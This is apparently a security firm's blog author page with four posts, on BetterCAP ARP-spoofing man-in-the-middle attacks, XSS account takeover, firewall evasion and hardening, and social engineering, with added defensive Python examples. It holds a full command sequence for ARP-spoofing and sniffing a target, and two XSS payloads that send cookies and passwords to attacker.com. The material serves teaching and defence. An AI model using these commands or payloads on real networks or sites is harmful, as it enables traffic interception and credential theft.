securiumsolutions, Author at Lorcam Securities

Man-in-the-Middle Attacks Made Easy with BetterCAP

A Man-in-the-Middle (MITM) attack is a type of cyber attack where an attacker secretly intercepts communication between two parties who believe they are directly communicating with each other. In other words, the attacker stands in the middle of the communication channel between two users or devices, without them knowing.

Installing bettercap:

<apt-get install bettercap>

I have already installed it.

To run it, type bettercap, then type help to list the available modules and commands.

Performing MITM: To perform the MITM we will use the following modules:

1. net.probe: sends different types of probe packets to the IPs in the subnet so that the net.recon module can detect them.
2. net.recon: periodically reads the ARP table to detect new hosts on the network.
3. arp.spoof: spoofs the selected host(s) to perform the MITM.
4. net.sniff: a network packet sniffer and fuzzer.

You can type help followed by the module name (for example help net.probe) to get details about that module:

Let’s start our MITM:

1. Start the prober module to send probe packets to the devices on the network (note: the probe module can automatically turn on the net.recon module).

<net.probe on>

2. Start host discovery

<net.recon on>

3. Set the arp.spoof module option fullduplex to true

<set arp.spoof.fullduplex true>

4. Specify the target to spoof

<set arp.spoof.targets <target ip>>

5. Start ARP spoofer:

<arp.spoof on>

6. Start the packet sniffer:

<net.sniff on>

7. Type help to see which modules are running.

Now look at the ARP table on any machine connected to that network; in my case I checked on my Windows machine using the command <arp -a>. Notice that the MAC address shown for the attacker machine and for the router is the same: the Windows machine ‘thinks’ the router’s MAC address is the same as Kali’s because its ARP table has been spoofed.
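A defender can check for the condition described above programmatically instead of reading the table by eye. The following Python script is an added example written for this page, not part of bettercap or of the original post: it parses <arp -a> style output (a constructed sample is embedded), ignores broadcast and multicast entries, and reports any MAC address claimed by more than one IP, in particular any host sharing the default gateway's MAC. The gateway address 192.168.1.1, the MAC values and the sample entries are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of Windows `arp -a` output while the table is spoofed:
# the gateway (192.168.1.1) and another host (192.168.1.20) report the same MAC.
SPOOFED_ARP_OUTPUT = """\
Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.20          aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Constructed sample of the same network with a healthy table.
CLEAN_ARP_OUTPUT = """\
Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           aa-bb-cc-dd-ee-ff     dynamic
  192.168.1.20          11-22-33-44-55-66     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""

# One IPv4 address followed by a MAC written with '-' (Windows) or ':' (Linux/macOS).
ENTRY_RE = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9A-Fa-f]{2}(?:[-:][0-9A-Fa-f]{2}){5})"
)


def parse_arp_table(text):
    """Return {ip: mac} for unicast entries, MAC normalised to aa:bb:cc:dd:ee:ff."""
    table = {}
    for ip, mac in ENTRY_RE.findall(text):
        mac = mac.lower().replace("-", ":")
        # Broadcast and IPv4 multicast MACs are never real hosts; skip them.
        if mac == "ff:ff:ff:ff:ff:ff" or mac.startswith("01:00:5e"):
            continue
        table[ip] = mac
    return table


def find_duplicate_macs(table):
    """Map each MAC that is claimed by more than one IP to the sorted list of those IPs."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def check_gateway(table, gateway_ip):
    """Return the other IPs that share the gateway's MAC, the classic ARP-spoof symptom."""
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return []
    return sorted(ip for ip, mac in table.items() if mac == gw_mac and ip != gateway_ip)


if __name__ == "__main__":
    for label, text in (("spoofed", SPOOFED_ARP_OUTPUT), ("clean", CLEAN_ARP_OUTPUT)):
        table = parse_arp_table(text)
        print(f"{label}: duplicates={find_duplicate_macs(table)} "
              f"sharing gateway MAC={check_gateway(table, '192.168.1.1')}")
```

On a real host, feed the script the live output of arp -a (or ip neigh on Linux, which the same regex accepts) instead of the embedded sample; a second IP answering with the gateway's MAC is exactly what the Windows screenshot in the post shows, and it is a condition worth alerting on from an endpoint agent rather than checking by hand.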


The XSS Threat: How Malicious Scripts Can Hijack Your Accounts

What is cross-site scripting (XSS)?

Cross-site scripting (XSS) remains one of the most prevalent and dangerous web security vulnerabilities. Essentially, XSS allows attackers to inject malicious script into web pages that are viewed by other users. But did you know that sophisticated XSS attacks can lead to full-blown account takeovers (ATOs)? In this blog, we’ll explore how XSS leads to ATOs.

How XSS Leads to Account Takeover

Account Takeover (ATO) is a serious threat where an attacker gains unauthorized access to a user’s account. XSS can facilitate ATO through various methods:

1. Session Hijacking

One of the most direct ways XSS leads to ATO is through session hijacking. When an attacker injects malicious JavaScript into a web page via XSS, they can access the victim’s session cookies if the application does not implement proper cookie security settings.

For Example:

<script>fetch('http://attacker.com?cookie='+document.cookie);</script>

This script sends the victim’s cookies to the attacker’s server, allowing the attacker to impersonate the victim by hijacking their session. It only works when the cookie security attributes are not set properly, i.e. when the session cookie is readable from JavaScript.

2. Credential Theft

XSS can also be used to steal credentials: the injected markup fetches the victim’s credentials directly, abusing the browser’s password auto-fill feature.

For Example:
<input id=username name=username>
<input type=password name=password onchange='if(this.value.length)fetch("http://attacker.com?username="+username.value+"&password="+this.value)'>

This injected markup collects the victim’s username and password when they interact with the page and sends the credentials to the attacker’s server.

Mitigating XSS to Prevent ATO

Preventing XSS and thereby reducing the risk of ATO involves a combination of best practices and security measures:

1. Input Validation and Output Encoding:

Ensure that all user inputs are properly validated and sanitized. Use context-sensitive output encoding to prevent the injection of malicious scripts.

2. Secure Cookie Attributes:

Use secure attributes for cookies, such as `HttpOnly`, `Secure`, and `SameSite`, to reduce the risk of session hijacking. The `HttpOnly` attribute prevents JavaScript from accessing cookies, `Secure` ensures cookies are only sent over HTTPS, and `SameSite` restricts cross-site requests.

3. Content Security Policy (CSP):

Implement a strong Content Security Policy to restrict the sources from which scripts can be loaded. CSP can help mitigate XSS by preventing the execution of unauthorized scripts.

4. Regular Security Audits:

Conduct regular security assessments, including penetration testing and code reviews, to identify and remediate XSS vulnerabilities before they can be exploited.

5. User Education:

Educate users about the risks of phishing and social engineering attacks. Awareness can help them recognize suspicious behavior and avoid falling victim to XSS-based attacks.
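The three technical mitigations above (output encoding, cookie attributes, CSP) can be shown together in code. The following Python is an added example, not part of the original post or of any web framework: it contrasts an unsafe template with a context-aware escaped one, restricts the scheme of user-supplied URLs (escaping alone does not stop a javascript: href), and builds the Set-Cookie and Content-Security-Policy header values described above. The function names, the cookie name session and the sample input are assumptions.

```python
import html
import secrets
from urllib.parse import urlsplit


def render_comment_unsafe(comment):
    """Vulnerable: raw user input is concatenated straight into the HTML body."""
    return f'<p class="comment">{comment}</p>'


def render_comment(comment):
    """HTML-body context: escape & < > " ' so the input can never become markup."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def safe_href(url):
    """URL-attribute context: a javascript: URL is valid attribute text, so the
    scheme must be restricted in addition to escaping."""
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_profile_link(display_name, url):
    """Link whose href and text are both user-controlled, each encoded for its context."""
    return f'<a href="{safe_href(url)}">{html.escape(display_name, quote=True)}</a>'


def new_session_id():
    """Unguessable session identifier."""
    return secrets.token_urlsafe(32)


def session_cookie_header(session_id, max_age=3600):
    """Set-Cookie value: HttpOnly keeps document.cookie from exposing it,
    Secure limits it to HTTPS, SameSite limits cross-site sending."""
    return (f"session={session_id}; Path=/; Max-Age={max_age}; "
            "HttpOnly; Secure; SameSite=Lax")


# Scripts may load only from our own origin; inline <script> blocks are refused,
# plugins are disabled and the page cannot be framed.
CSP_HEADER = ("default-src 'self'; script-src 'self'; object-src 'none'; "
              "base-uri 'none'; frame-ancestors 'none'")


def security_headers(session_id):
    """Response headers a login handler would attach (assumed names, not a framework API)."""
    return {
        "Content-Security-Policy": CSP_HEADER,
        "Set-Cookie": session_cookie_header(session_id),
    }


if __name__ == "__main__":
    sample = "<script>alert(1)</script>"  # constructed test input
    print("unsafe :", render_comment_unsafe(sample))
    print("escaped:", render_comment(sample))
    print("link   :", render_profile_link("me", "javascript:alert(1)"))
    for name, value in security_headers(new_session_id()).items():
        print(f"{name}: {value}")
```

With the HttpOnly flag in place the first payload in this post returns nothing useful, and with script-src 'self' the browser refuses to run the injected inline script at all; output encoding is what stops the injection from happening in the first place, so all three layers belong together.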

Conclusion:

The art of exploiting XSS vulnerabilities to achieve an Account Takeover underscores the critical need for robust web security practices. By understanding how XSS can lead to ATO, organizations can better prepare and defend against these threats. Implementing preventive measures, such as input validation, secure cookie practices, and CSP, along with regular security reviews, can significantly reduce the risk and protect users from account takeovers.


A Beginner’s Guide to Firewalls and Network Safety

Firewalls are a very important part of any organization’s security infrastructure. They act as a barrier between trusted networks and harmful sources.

This module explains firewalls: their functionality, their configurations, and the strategies used to bypass or strengthen them, giving ethical hackers the knowledge to test and secure these systems.

Let’s explore what this module offers and why firewalls are the first line of network defense.

What is a Firewall?

A firewall is a security device or software that monitors and controls incoming and outgoing traffic based on predefined rules. It works as a digital gatekeeper which allows legitimate traffic while blocking malicious or unauthorized access. Firewalls are essential for securing networks from threats like malware, hackers, and unauthorized users.

Main Topics :

#Types of Firewalls

1. Packet-Filtering Firewalls

These firewalls examine individual data packets against a set of predefined rules. The rules are based on criteria like source and destination IP addresses, ports, and protocols.

  • How It Works:
    • Filters traffic based on headers in each packet.
    • Blocks or allows packets based on the rule set (e.g., block port 23 for Telnet).
  • Strengths:
    • Simple and fast.
    • Effective for basic traffic control.
  • Limitations:
    • Cannot analyze packet content or track sessions.
    • Vulnerable to attacks like IP spoofing.

2. Stateful Inspection Firewalls

They track the state of active connections and use this context to make filtering decisions.

  • How It Works:
    • Maintains a state table to monitor ongoing connections.
    • Only allows packets that are part of established sessions.
  • Strengths:
    • Provides better security by understanding connection states.
    • Prevents unauthorized access while allowing legitimate traffic.
  • Limitations:
    • More resource-intensive than packet-filtering firewalls.
    • Requires more configuration and management.

3. Proxy Firewalls

These firewalls work between users and the server. All traffic passes through the proxy, which analyzes and filters it before forwarding.

  • How It Works:
    • Inspects traffic content.
    • Masks the user’s IP address, enhancing anonymity.
  • Strengths:
    • Offers detailed content inspection and robust security.
    • Can block specific content or applications, such as websites or downloads.
  • Limitations:
    • Slower compared to other types due to in-depth analysis.
    • May require significant configuration and maintenance.

4. Next-Generation Firewalls (NGFWs): Combine traditional firewalls with advanced features like deep packet inspection, intrusion prevention, and application-level filtering.
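To make the difference between packet-filtering and stateful inspection (types 1 and 2 above) concrete, here is an added Python example, not from the module or from any firewall product, that runs both over the same policy: a stateless first-match filter that sees only packet headers, and a stateful wrapper that records allowed outbound flows and admits their replies from its state table. The rules, the packets and the addresses (documentation ranges 10.0.0.0/24 inside, 203.0.113.0/24 and 198.51.100.0/24 outside) are all constructed.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Packet:
    direction: str  # "in" (towards the LAN) or "out" (leaving the LAN)
    proto: str
    src: str
    sport: int
    dst: str
    dport: int


@dataclass(frozen=True)
class Rule:
    action: str           # "allow" or "deny"
    direction: str
    proto: str
    src: str = "any"      # CIDR or "any"
    dst: str = "any"
    sport: object = "any"  # port number or "any"
    dport: object = "any"

    def matches(self, p: Packet) -> bool:
        """Header-only comparison: this is all a packet filter can see."""
        if self.direction != p.direction or self.proto != p.proto:
            return False
        if self.src != "any" and ip_address(p.src) not in ip_network(self.src):
            return False
        if self.dst != "any" and ip_address(p.dst) not in ip_network(self.dst):
            return False
        if self.sport != "any" and self.sport != p.sport:
            return False
        if self.dport != "any" and self.dport != p.dport:
            return False
        return True


def packet_filter(rules, p):
    """Stateless filtering: first matching rule wins, default deny."""
    for rule in rules:
        if rule.matches(p):
            return rule.action
    return "deny"


class StatefulFirewall:
    """Same rules, plus a state table of the flows allowed on the way out."""

    def __init__(self, rules):
        self.rules = rules
        self.state = set()  # 5-tuples of established flows

    def process(self, p):
        # A packet whose reverse 5-tuple is in the table belongs to an
        # established session and is admitted without a separate inbound rule.
        reverse = (p.proto, p.dst, p.dport, p.src, p.sport)
        if reverse in self.state:
            return "allow"
        action = packet_filter(self.rules, p)
        if action == "allow":
            self.state.add((p.proto, p.src, p.sport, p.dst, p.dport))
        return action


# Policy: block inbound Telnet, let the LAN reach HTTPS servers.
BASE_RULES = [
    Rule("deny", "in", "tcp", dport=23),
    Rule("allow", "out", "tcp", src="10.0.0.0/24", dport=443),
]
# A stateless filter has no memory of outbound connections, so it needs an
# extra rule to let HTTPS replies back in; that rule is what opens the hole.
STATELESS_RULES = BASE_RULES + [Rule("allow", "in", "tcp", dst="10.0.0.0/24", sport=443)]

PACKETS = {  # constructed traffic, processed in this order
    "outbound_https": Packet("out", "tcp", "10.0.0.5", 51000, "203.0.113.10", 443),
    "https_reply":    Packet("in", "tcp", "203.0.113.10", 443, "10.0.0.5", 51000),
    "unsolicited":    Packet("in", "tcp", "198.51.100.7", 443, "10.0.0.9", 51000),
    "inbound_telnet": Packet("in", "tcp", "198.51.100.7", 40000, "10.0.0.5", 23),
}


def evaluate_stateless():
    return {name: packet_filter(STATELESS_RULES, p) for name, p in PACKETS.items()}


def evaluate_stateful():
    fw = StatefulFirewall(BASE_RULES)
    return {name: fw.process(p) for name, p in PACKETS.items()}


if __name__ == "__main__":
    stateless, stateful = evaluate_stateless(), evaluate_stateful()
    for name in PACKETS:
        print(f"{name:15} stateless={stateless[name]:5} stateful={stateful[name]}")
```

The "unsolicited" packet is the point of the exercise: anyone who sends from source port 443 gets through the stateless reply rule, while the stateful firewall drops it because no inside host ever opened a connection to 198.51.100.7. That is the "cannot track sessions" limitation listed under packet-filtering firewalls, expressed as a concrete rule-set.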

#Firewall Architectures

  • Network-Based Firewalls: Deployed at network perimeters to secure large-scale systems.
  • Host-Based Firewalls: Installed on individual devices to protect them directly.
  • Cloud Firewalls: Secure virtual environments and cloud-based resources.

#How Firewalls Work

A firewall enforces security policies through Access Control Lists (ACLs) and predefined rules.

  • Inbound and Outbound Filtering: Monitoring data entering or leaving the network.
  • Rule Creation: Setting up rules based on IP addresses, ports, and protocols.
  • Zones and Interfaces: Configuring trusted, untrusted, and DMZ zones for better segmentation.

#Firewall Evasion Techniques

Ethical hackers need to understand how attackers bypass firewalls to secure them better.

1. Tunneling

Tunneling involves wrapping malicious traffic inside trusted protocols like HTTP or HTTPS so that it appears harmless. Since firewalls often allow these protocols for regular web traffic, malicious payloads can pass undetected.

  • Defense:
    • Use deep packet inspection to analyze the content of traffic.
    • Restrict unnecessary protocols and monitor for unusual traffic patterns.

2. Spoofing

Spoofing involves manipulating packet headers, such as the source IP address, to disguise the traffic or bypass rules. This can trick firewalls into allowing unauthorized traffic.

  • Defense:
    • Implement strict IP validation and anti-spoofing measures.

3. Misconfiguration Exploitation

Attackers can exploit overly permissive firewall rules, such as unnecessarily open ports or weak rules, which provide an easy way to bypass security controls.

  • Defense:
    • Regularly review and update firewall rules.
    • Use automated tools to audit configurations.

4. Encryption

Encryption is used to hide malicious traffic within encrypted connections, such as HTTPS or VPNs. Since the content is encrypted, firewalls cannot inspect the payload without decryption.

  • Defense:
    • Implement SSL/TLS inspection to analyze encrypted traffic.

#Firewall Hardening and Countermeasures

  • Ensuring firmware and rules are up-to-date.
  • Avoiding overly permissive rules and keeping ACLs clean.
  • Using VLANs and zones to isolate sensitive resources.
  • Combining firewalls with IPS for better threat detection.
  • Continuously analyzing firewall logs to detect suspicious activities.

Conclusion

This module guides us to understand, configure, and test firewalls. Whether you’re learning about basic packet-filtering firewalls or advanced next-gen firewalls, this module ensures you’re equipped with the skills to identify vulnerabilities and defend against threats.

Firewalls only help you detect malicious entry into your system; once something is inside, you have to remove it from your system yourself.


Social Engineering: Understanding the Human Side of Cyber Attacks

What Is Social Engineering?

Social engineering is not a cyber attack in itself. It is the tactic of manipulating, influencing, or deceiving a victim in order to gain control of or access to computer systems and servers, or to steal personal and financial information and much more from victims, companies, and organizations. Social engineers, those who carry out social engineering attacks, exploit this human element, essentially “hacking” humans.

How does social engineering work?

In a typical social engineering attack, a cybercriminal will communicate with the intended victim by saying they are from a trusted organization. In some cases, they will even impersonate a person the victim knows.

For examples:

Imagine someone receives a generic message warning them of fraudulent activity on their bank account. They might ignore it, thinking it’s a spam message. However, if the message appears to come directly from their bank, with accurate branding and a familiar tone, they are more likely to pay attention. To make the message more believable, the attacker might include specific details that match the victim’s recent activities: for example, it could mention a suspicious charge from a country they recently visited or a duplicate charge for a bill they have already legitimately paid. Such specific information increases the sense of urgency and legitimacy, making it more likely that the victim will engage, and the message’s effect is amplified further by leveraging emotional triggers such as fear and urgency.

Types of social engineering attacks?

Cyber criminals often employ social engineering tactics to exploit human vulnerabilities. These attacks can take various forms, such as text messages, phone calls, or in-person interactions. Social engineering attacks come in many different shapes and can be performed anywhere human interaction is involved. Let’s explore some of the common methods.

Phishing: An attempt to acquire sensitive information such as usernames, passwords, and credit card details by misleading victims through bulk email, SMS text messages, or phone calls. Phishing messages create a sense of urgency, curiosity, or fear to trigger an emotional reaction. The message prods victims into revealing sensitive information, clicking on links to malicious websites, or opening attachments that contain malware.

Baiting: A type of social engineering attack where a scammer uses a false promise to lure a victim into a trap that may steal personal and financial information or infect the system with malware. The trap could be in the form of a malicious attachment with an enticing name.

Example: USB baiting sounds a bit unrealistic, but it happens more often than you might think. Essentially, cybercriminals install malware onto USB sticks and leave them in strategic places, hoping that someone will pick one up and plug it into a corporate environment, thereby unwittingly unleashing malicious code into their organization.

Tailgating: Also known as “piggybacking”, this is a physical breach in which an unauthorized person uses social engineering tactics to talk their way into a restricted or employee-only area. The attacker might impersonate a delivery driver or a custodial worker. Once an employee opens the door, the attacker asks them to hold it, thereby gaining access to the building.

Dumpster Diving: A scammer will search for sensitive information e.g., bank statements, pre-approved credit cards, student loans, other account information, in the garbage when it hasn’t been properly sanitized or destroyed.

Rogue Wi-Fi Networks: Attackers set up a fake Wi-Fi to intercept data from unsuspecting victims.

If you want to know about all the types of social engineering, you can search the internet.

Social Engineering Case Studies in Companies (collected from the internet)

Twitter – 2020

In July 2020, hackers gained access to Twitter’s (now known as X) internal systems and compromised high-profile accounts, including those owned by Barack Obama, Elon Musk, Bill Gates, and more. The hackers used social engineering tactics to manipulate employees and gain access to internal tools. They posted fraudulent messages from these accounts promoting a Bitcoin scam, asking people to send cryptocurrency to a specified address.

The incident exposed various security weaknesses and brought into question the company’s ability to protect high-level accounts. This incident damaged users’ trust in Twitter’s security measures, as users and experts criticized the company’s response. The attack caused a temporary drop in Twitter’s stock price and led to a federal investigation.

Uber – 2022 and 2016

In 2020, an attacker used social engineering to compromise Uber’s systems. The individual who admitted to the hack informed The New York Times that they had sent a text message to an Uber employee, posing as corporate IT personnel. Through social engineering, the attacker convinced the employee to disclose a password, granting the hacker entry into Uber’s systems.

The attacker claimed to have access to internal messaging services, databases, source code and emails.

This was not Uber’s first breach. After a previous attack in 2016, the former Chief Security Officer (CSO) was convicted of federal charges for covering up a data breach involving millions of Uber user records. That attack was not related to social engineering. According to reports, developers uploaded code containing credentials to GitHub, where attackers found them and used them to access Uber’s systems, resulting in a data breach affecting 57 million riders.

Uber was fined $1.2 million by British and Dutch data regulators for weak security practices exposed by the attack.

Sony Pictures – 2014

A criminal group named the “Guardians of Peace” targeted Sony Pictures Entertainment. The attack resulted in the theft and release of sensitive company data, including emails, employee information, and unreleased films. According to the US Government, the attackers used phishing to gain access to Sony’s network.

The breach significantly damaged Sony’s reputation, as leaked emails revealed controversial conversations among executives and exposed internal conflicts. The attack cost Sony millions of dollars in remediation efforts, legal settlements, and lost revenue from leaked films. Additionally, the incident prompted legal investigations and raised concerns about cybersecurity vulnerabilities in the entertainment industry.

Social Engineering Prevention

Preventing social engineering attacks requires a combination of awareness, vigilance, and security best practices. Here are some key ways to protect yourself:

1. Awareness and Training: learn to recognize the common attack types (e.g., phishing, pretexting, baiting, tailgating).
2. Verify Identities: give out information or access only after the requester’s identity has been verified.
3. Be Cautious with Emails and Links

  • Do not click on unknown or suspicious links.
  • Check for red flags in emails:
    • Urgency or threats
    • Spelling errors
    • Unfamiliar sender addresses
    • Generic greetings like “Dear User”
  • Hover over links to inspect their destination before clicking.

4. Use Strong Authentication
5. Secure Personal Information
6. Be Wary of Phone and In-Person Scams
7. Report Suspicious Activities

  • If you suspect a social engineering attempt, report it to your organization’s security team or relevant authorities.
  • Keep records of suspicious emails or calls for future reference.

8. Use Security Tools

  • Install email filters to detect phishing attempts.
  • Use endpoint security solutions to prevent malware infections.
  • Enable browser security features to detect malicious sites.
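The email red-flag checklist under point 3 can be turned into an automated triage check, which is what the email filters under point 8 do at scale. The following Python script is an added example, not from the original post or from any mail-filtering product: it scores a constructed message (sender, subject, HTML body) against the list, flagging urgency wording, a generic greeting, a link whose visible text names a different host than its real href (the "hover over links" check), and a sender domain outside an allow-list. The keyword lists, the trusted domain example-bank.com and both sample messages are assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed keyword lists; a real filter would use far larger, tuned lists.
URGENCY_WORDS = ("immediately", "urgent", "within 24 hours", "suspended", "verify now")
GENERIC_GREETINGS = ("dear user", "dear customer", "dear account holder")
# Matches <a ... href="...">visible text</a>
LINK_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def link_mismatches(body_html):
    """Links whose visible text looks like a URL but whose href goes to another host."""
    mismatched = []
    for href, text in LINK_RE.findall(body_html):
        text = text.strip()
        if re.match(r"https?://", text, re.I) and host_of(text) != host_of(href):
            mismatched.append((text, href))
    return mismatched


def sender_domain(from_header):
    """'Name <user@host>' or 'user@host' -> 'host'."""
    return from_header.rsplit("@", 1)[-1].strip("> ").lower()


def red_flags(msg, trusted_sender_domains):
    """Return the set of checklist items the message trips."""
    flags = set()
    lowered = (msg["subject"] + " " + msg["body_html"]).lower()
    if any(word in lowered for word in URGENCY_WORDS):
        flags.add("urgency")
    if any(greeting in lowered for greeting in GENERIC_GREETINGS):
        flags.add("generic_greeting")
    if link_mismatches(msg["body_html"]):
        flags.add("link_mismatch")
    if sender_domain(msg["from"]) not in trusted_sender_domains:
        flags.add("unfamiliar_sender")
    return flags


TRUSTED = {"example-bank.com"}  # constructed allow-list

# Constructed phishing sample: look-alike sender domain, generic greeting,
# pressure wording, and a link whose text does not match its destination.
PHISHING_MSG = {
    "from": "Example Bank Security <alerts@examp1e-bank.com>",
    "subject": "Urgent: your account will be suspended",
    "body_html": (
        "<p>Dear User,</p><p>We detected unusual activity. Verify now or your "
        'account will be suspended within 24 hours: <a href="http://203.0.113.5/login">'
        "https://www.example-bank.com/login</a></p>"
    ),
}

# Constructed legitimate sample from the real domain, personal greeting, honest link.
BENIGN_MSG = {
    "from": "Example Bank <alerts@example-bank.com>",
    "subject": "Your January statement is available",
    "body_html": (
        "<p>Hello Priya,</p><p>Your statement is ready: "
        '<a href="https://www.example-bank.com/statements">'
        "https://www.example-bank.com/statements</a></p>"
    ),
}


if __name__ == "__main__":
    for label, msg in (("phishing", PHISHING_MSG), ("benign", BENIGN_MSG)):
        print(f"{label}: {sorted(red_flags(msg, TRUSTED))}")
```

Each flag on its own is weak evidence (legitimate fraud alerts are urgent too), so a filter would weight and combine them; the point of the example is that every item on the human checklist above has a mechanical counterpart that can be applied before the message ever reaches an inbox.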

